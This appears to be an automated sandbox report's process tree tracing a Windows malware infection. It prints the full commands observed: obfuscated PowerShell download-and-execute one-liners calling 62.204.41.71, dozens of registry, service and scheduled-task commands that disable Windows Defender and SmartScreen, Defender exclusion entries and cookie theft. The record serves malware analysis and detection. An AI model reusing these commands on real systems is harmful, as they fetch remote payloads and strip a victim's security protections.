                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                                7⤵
                                                                • Blocklisted process makes network request
                                                                • Adds Run key to start application
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5004
                                                                • C:\Windows\SysWOW64\svchost.exe
                                                                  "C:\Windows\System32\svchost.exe"
                                                                  8⤵
                                                                    PID:4996
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4996 -s 488
                                                                      9⤵
                                                                      • Program crash
                                                                      PID:1596
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                                  7⤵
                                                                  • Blocklisted process makes network request
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4752
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\system32\cmd.exe" /c attrib +s +h C:\Users\Admin\AppData\Roaming\OneDrive
                                                                    8⤵
                                                                      PID:5512
                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                        attrib +s +h C:\Users\Admin\AppData\Roaming\OneDrive
                                                                        9⤵
                                                                        • Executes dropped EXE
                                                                        • Modifies Internet Explorer settings
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        • Views/modifies file attributes
                                                                        PID:5420
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\system32\cmd.exe" /c attrib +s +h C:\ProgramData\OneDrive
                                                                      8⤵
                                                                        PID:992
                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                          attrib +s +h C:\ProgramData\OneDrive
                                                                          9⤵
                                                                          • Views/modifies file attributes
                                                                          PID:5844
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -exec bypass start-process C:\Users\Admin\AppData\Roaming\OneDrive\Offer.vbs
                                                                        8⤵
                                                                          PID:5848
                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\OneDrive\Offer.vbs"
                                                                            9⤵
                                                                              PID:5060
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\OneDrive\Offer.bat" "
                                                                                10⤵
                                                                                  PID:5620
                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    11⤵
                                                                                      PID:6024
                                                                                    • C:\Users\Admin\AppData\Roaming\OneDrive\Offer.exe
                                                                                      Offer.exe
                                                                                      11⤵
                                                                                        PID:4256
                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                        timeout /t 4
                                                                                        11⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:5512
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                        11⤵
                                                                                          PID:5304
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                          11⤵
                                                                                            PID:4844
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                            11⤵
                                                                                              PID:5208
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                              11⤵
                                                                                                PID:1520
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                11⤵
                                                                                                  PID:5244
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                  11⤵
                                                                                                    PID:4188
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                    11⤵
                                                                                                    • Adds Run key to start application
                                                                                                    PID:4836
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                    11⤵
                                                                                                      PID:5824
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                                                                                      11⤵
                                                                                                        PID:60
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                        11⤵
                                                                                                          PID:2524
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
                                                                                                          11⤵
                                                                                                            PID:960
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
                                                                                                            11⤵
                                                                                                              PID:4452
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t "REG_DWORD" /d "0" /f
                                                                                                              11⤵
                                                                                                                PID:4536
                                                                                                              • C:\Windows\SysWOW64\takeown.exe
                                                                                                                takeown /f "C:\Windows\System32\smartscreen.exe" /a
                                                                                                                11⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Possible privilege escalation attempt
                                                                                                                • Loads dropped DLL
                                                                                                                • Modifies file permissions
                                                                                                                PID:1644
                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                icacls "C:\Windows\System32\smartscreen.exe" /grant:r Administrators:F /c
                                                                                                                11⤵
                                                                                                                • Possible privilege escalation attempt
                                                                                                                • Modifies file permissions
                                                                                                                PID:5124
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /im smartscreen.exe /f
                                                                                                                11⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:4132
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyMonitor" /Disable
                                                                                                                11⤵
                                                                                                                  PID:1444
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyRefreshTask" /Disable
                                                                                                                  11⤵
                                                                                                                    PID:5452
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                    11⤵
                                                                                                                      PID:696
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                      11⤵
                                                                                                                        PID:5096
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                        11⤵
                                                                                                                          PID:4284
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                          11⤵
                                                                                                                            PID:5084
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                            11⤵
                                                                                                                              PID:5440
                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                              sc stop WinDefend
                                                                                                                              11⤵
                                                                                                                                PID:6040
                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                sc stop WdNisDrv
                                                                                                                                11⤵
                                                                                                                                  PID:1312
                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                  sc stop WdNisSvc
                                                                                                                                  11⤵
                                                                                                                                    PID:5540
                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                    sc stop WdFilter
                                                                                                                                    11⤵
                                                                                                                                      PID:6056
                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                      sc stop WdBoot
                                                                                                                                      11⤵
                                                                                                                                        PID:1140
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                        11⤵
                                                                                                                                          PID:5812
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                          11⤵
                                                                                                                                            PID:6124
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                            11⤵
                                                                                                                                              PID:4372
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                              11⤵
                                                                                                                                                PID:5448
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                11⤵
                                                                                                                                                  PID:4012
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                                                                                  11⤵
                                                                                                                                                    PID:5956
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                                    11⤵
                                                                                                                                                      PID:3420
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                                      11⤵
                                                                                                                                                        PID:5856
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                                                                        11⤵
                                                                                                                                                          PID:5868
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                                                                          11⤵
                                                                                                                                                            PID:2528
                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                            timeout /t 2
                                                                                                                                                            11⤵
                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                            PID:4684
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe
                                                                                                                                                            Power.exe Regedit.exe /S Offer.reg
                                                                                                                                                            11⤵
                                                                                                                                                              PID:5360
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe" Regedit.exe /S Offer.reg
                                                                                                                                                                12⤵
                                                                                                                                                                  PID:5176
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe" /TI/ Regedit.exe /S Offer.reg
                                                                                                                                                                    13⤵
                                                                                                                                                                      PID:4852
                                                                                                                                                                      • C:\Windows\Regedit.exe
                                                                                                                                                                        "C:\Windows\Regedit.exe" /S Offer.reg
                                                                                                                                                                        14⤵
                                                                                                                                                                        • Runs .reg file with regedit
                                                                                                                                                                        PID:4760
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance" /f
                                                                                                                                                                  11⤵
                                                                                                                                                                    PID:5004
                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                    sc delete SgrmBroker
                                                                                                                                                                    11⤵
                                                                                                                                                                      PID:5896
                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                      sc delete SgrmAgent
                                                                                                                                                                      11⤵
                                                                                                                                                                        PID:4664
                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                        sc delete SecurityHealthService
                                                                                                                                                                        11⤵
                                                                                                                                                                          PID:5784
                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                          sc delete WdBoot
                                                                                                                                                                          11⤵
                                                                                                                                                                            PID:4472
                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                            sc delete WdFiltrer
                                                                                                                                                                            11⤵
                                                                                                                                                                              PID:4884
                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                              sc delete WdNisSvc
                                                                                                                                                                              11⤵
                                                                                                                                                                                PID:5880
                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                sc delete WdNisDrv
                                                                                                                                                                                11⤵
                                                                                                                                                                                  PID:5612
                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                  sc delete wscsvc
                                                                                                                                                                                  11⤵
                                                                                                                                                                                    PID:4896
                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                    sc delete Sense
                                                                                                                                                                                    11⤵
                                                                                                                                                                                      PID:4892
                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                      sc delete WinDefend
                                                                                                                                                                                      11⤵
                                                                                                                                                                                        PID:4724
                                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                        timeout /t 2
                                                                                                                                                                                        11⤵
                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                        PID:3388
                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath "C:/Windows"
                                                                                                                                                                                        11⤵
                                                                                                                                                                                          PID:3600
                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath "C:/Users"
                                                                                                                                                                                          11⤵
                                                                                                                                                                                            PID:3024
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring"
                                                                                                                                                                                            11⤵
                                                                                                                                                                                              PID:4656
                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
                                                                                                                                                                                              11⤵
                                                                                                                                                                                                PID:4412
                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                powershell.exe -command "Set-MpPreference -PUAProtection disable"
                                                                                                                                                                                                11⤵
                                                                                                                                                                                                  PID:2276
                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:5112
                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:3836
                                                                                                                                                                                        • C:\Users\Admin\Documents\lp8mRbbLvvUw_NlFQIsm6Yjz.exe
                                                                                                                                                                                          "C:\Users\Admin\Documents\lp8mRbbLvvUw_NlFQIsm6Yjz.exe"
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:4140
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im lp8mRbbLvvUw_NlFQIsm6Yjz.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\lp8mRbbLvvUw_NlFQIsm6Yjz.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                            7⤵
                                                                                                                                                                                              PID:880
                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                taskkill /im lp8mRbbLvvUw_NlFQIsm6Yjz.exe /f
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                PID:5260
                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                timeout /t 6
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                PID:6136
                                                                                                                                                                                          • C:\Users\Admin\Documents\V8mSDJYVZdnfkoOXRHQbNy2T.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\V8mSDJYVZdnfkoOXRHQbNy2T.exe"
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:3616
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3616 -s 448
                                                                                                                                                                                              7⤵
                                                                                                                                                                                              • Program crash
                                                                                                                                                                                              PID:5952
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3616 -s 440
                                                                                                                                                                                              7⤵
                                                                                                                                                                                              • Program crash
                                                                                                                                                                                              PID:5044
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sotema_5.exe
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                        PID:1492
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_5.exe
                                                                                                                                                                                          sotema_5.exe
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:448
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sotema_4.exe
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                        PID:2180
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sotema_3.exe
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                        PID:3108
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_3.exe
                                                                                                                                                                                          sotema_3.exe
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                                                          PID:860
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 1064
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            PID:3324
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sotema_2.exe
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                        PID:1224
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_2.exe
                                                                                                                                                                                          sotema_2.exe
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                          PID:1640
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_4.exe
                                                                                                                                                                                  sotema_4.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                  PID:3832
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:1776
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                    PID:1904
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3608 -ip 3608
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:3588
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 860 -ip 860
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:1932
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4364 -ip 4364
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:4904
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3616 -ip 3616
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:4876
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4392 -ip 4392
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:4948
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4308 -ip 4308
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:4960
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4164 -ip 4164
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:5248
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3616 -ip 3616
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:5584
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4364 -ip 4364
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:5744
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4392 -ip 4392
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:5788
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSEBE4.tmp\Install.exe
                                                                                                                                                                                                      .\Install.exe /S /site_id "525403"
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                      PID:5884
                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:5500
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:220
                                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:4116
                                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
